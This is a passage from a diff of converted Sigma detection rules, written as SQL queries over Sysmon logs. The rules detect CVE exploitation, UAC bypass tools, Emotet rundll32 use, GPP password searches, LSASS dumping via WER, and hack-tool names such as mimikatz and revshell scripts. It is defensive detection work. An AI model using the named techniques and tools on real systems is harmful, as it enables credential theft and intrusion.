'%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", @@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects 